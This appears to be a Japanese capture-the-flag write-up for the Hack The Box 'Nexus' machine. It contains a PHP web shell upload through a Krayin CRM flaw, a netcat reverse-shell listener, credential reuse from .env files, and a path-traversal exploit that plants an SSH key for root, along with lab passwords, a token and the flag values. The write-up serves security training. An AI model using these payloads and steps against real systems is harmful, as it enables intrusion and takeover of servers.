
# Hack The Box Nexus マシン攻略記事:偵察、Gitea 認証情報の発見、CVE-2026-38526 を介した Krayin CRM の悪用、初期アクセス、そして脆弱な Gitea テンプレート同期サービスを介した権限昇格を網羅。
English 🇺🇸 | Español 🇪🇸
Nexus は Hack The Box の Easy 難易度の Linux マシンであり、仮想ホストの列挙、露出した認証情報、脆弱な Web アプリケーション機能、リモートコード実行、認証情報の再利用、ローカル権限昇格を含む多段階の攻撃チェーンを示しています。
偵察
│
▼
仮想ホスト列挙
│
├── git.nexus.htb
└── billing.nexus.htb
│
▼
Gitea コミット履歴
│
▼
露出した認証情報
│
▼
Krayin CRM ログイン
│
▼
CVE-2026-38526
│
▼
PHP ウェブシェル
│
▼
リバースシェル
(www-data)
│
▼
アプリケーション .env
│
▼
jones として SSH
│
▼
gitea-template-sync
│
▼
パストラバーサル
│
▼
悪意のある Git リポジトリ
│
▼
root として SSH
root への権限昇格ターゲット IP: 10.129.82.92
nmap -p- -sV -sC -oN nexus_full_scan.txt 10.129.82.92
22/tcp open ssh OpenSSH 9.6p1 Ubuntu
80/tcp open http nginx 1.24.0 (Ubuntu)
gobuster vhost \
-u http://nexus.htb \
-w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
--append-domain
git.nexus.htb → Gitea
billing.nexus.htb → Krayin CRM
発見されたホストを /etc/hosts に追加:
echo "10.129.82.92 nexus.htb git.nexus.htb billing.nexus.htb" | sudo tee -a /etc/hosts
以下に移動:
http://git.nexus.htb
次の名前のリポジトリ:
admin/krayin-docker-setup
には、Git 履歴に有用な情報が含まれています。
.env ファイルは以前のコミットから復元でき、現在のバージョンには存在しない認証情報が明らかになります。
| サービス | ユーザー名 | パスワード |
|---|---|---|
| Krayin CRM | [email protected] | N27xh!!2ucY04 |
| Gitea | jones | N27xh!!2ucY04 |
メールアドレス [email protected] は、メイン Web サイトの採用情報セクションでも確認されました。
URL: http://billing.nexus.htb/admin/login
Email: [email protected]
Password: N27xh!!2ucY04
以下に移動:
/admin/mail/sent
次に:
ペイロードは以下に保存されています:
exploits/CVE-2026-38526/shell.php
ペイロード:
<?php system($_GET["cmd"]); ?>
関連する multipart フィールドは次のとおりです:
Content-Disposition: form-data; name="attachments[]"; filename="shell.php"
Content-Type: application/x-php
アップロード成功後:
http://billing.nexus.htb/storage/emails/2/shell.php?cmd=id
期待される結果:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
リスナーを起動:
nc -lvnp 4444
次に、アップロードしたウェブシェルを通じてリバースシェルをトリガーします。
Python 実装は以下で利用可能です:
exploits/CVE-2026-38526/reverse_shell.py
この段階で、シェルは次のユーザーとして取得されます:
www-data
Krayin の設定を確認:
cat /var/www/krayin/.env
認証情報が見つかります:
DB_USERNAME=krayin
DB_PASSWORD=y27xb3ha!!74GbR
cat /etc/passwd | grep sh$
jones アカウントが特定されます。
パスワード:
y27xb3ha!!74GbR
f20cbf9aeb6bb228d356a42ff49c1933
systemctl list-units | grep -i gitea
次のサービスとタイマーが特定されます:
gitea-template-sync.timer
gitea-template-sync.service
このサービスは昇格した権限で実行されます。
/etc/gitea/template-sync.py
同期メカニズムはパス構築を使用しており、パストラバーサルを通じて悪用される可能性があります。
SSH キーペアを生成:
ssh-keygen -t ed25519 -f /tmp/nexus_root -N ""
cat /tmp/nexus_root.pub
Git オブジェクト操作エクスプロイトは以下にあります:
exploits/gitea_template_sync/exploit_git.py
リポジトリを作成:
cd /tmp
rm -rf exploit
mkdir exploit
cd exploit
git init
python3 exploit_git.py
リポジトリは次のブランチを使用する必要があります:
main
以下から個人アクセストークンを生成:
http://git.nexus.htb
以下に移動:
Settings → Applications
次にリモートを設定:
git remote set-url origin http://jones:[email protected]/jones/exploit.git
悪意のあるリポジトリをプッシュ:
git push -f origin main
同期ログを監視:
tail -f /var/log/template-sync.log
同期が成功すると、悪意のある Git ツリーが特権サービスによって処理されます。
例:
[2026-08-27 02:01:30] Syncing template: jones/exploit
[2026-08-27 02:01:30] synced: ../../../../../root/.ssh/authorized_keys
[2026-08-27 02:01:30] Template sync complete
SSH 公開鍵が root アカウントに書き込まれたら:
ssh -i /tmp/nexus_root [email protected]
アクセスを確認:
whoami
期待される結果:
root
root フラグを取得:
cat /root/root.txt
85be1d2a3084e387da0e7dd118908c63
| フラグ | 値 |
|---|---|
| User | f20cbf9aeb6bb228d356a42ff49c1933 |
| Root | 85be1d2a3084e387da0e7dd118908c63 |
これらの認証情報は、このリポジトリで文書化されている Hack The Box ラボ環境に属するものです。
htb-labs-nexus/
├── README.md
├── exploits/
│ ├── CVE-2026-38526/
│ │ ├── shell.php
│ │ ├── reverse_shell.py
│ │ └── burp_request.txt
│ └── gitea_template_sync/
│ ├── exploit_git.py
│ ├── create_repo.sh
│ └── key.pub
├── scripts/
│ ├── linpeas.sh
│ ├── LinEnum.sh
│ └── enum_services.sh
├── assets/
│ ├── nmap_scan.txt
│ ├── gobuster_vhost.txt
│ └── credentials.txt
├── screenshots/
│ ├── gitea_repo.png
│ ├── crm_login.png
│ ├── webshell.png
│ └── root_flag.png
└── notes/
├── methodology.md
├── commands.md
└── credentials.md
このリポジトリは教育目的および許可されたセキュリティテストのみを対象としています。
ここで文書化されているテクニック、認証情報、エクスプロイト、コマンドは、明示的な許可なしにシステムに対して使用してはなりません。
root として実行されるサービスは、権限昇格のベクトルになり得ます。⭐ この write-up が役に立った場合は、リポジトリにスターを付けることを検討してください。
| サービス | ユーザー名 | パスワード / キー |
|---|
| Krayin CRM | [email protected] | N27xh!!2ucY04 |
| Gitea | jones | N27xh!!2ucY04 |
| Gitea Token | jones | 1dd7105bf7e57cad02c5a56af5d92703a7839364 |
| SSH | jones | y27xb3ha!!74GbR |
| SSH Root | root | /tmp/nexus_root |
| ツール | 目的 |
|---|
| Nmap | ポートおよびサービスの列挙 |
| Gobuster | 仮想ホストの列挙 |
| Burp Suite | HTTP リクエストのインターセプトと変更 |
| Git | リポジトリの分析と悪意のあるリポジトリの構築 |
| Python 3 | エクスプロイトスクリプト |
| Netcat | リバースシェルリスナー |
| LinEnum | Linux の列挙 |
| LinPEAS | 権限昇格の列挙 |
| SSH | リモートアクセス |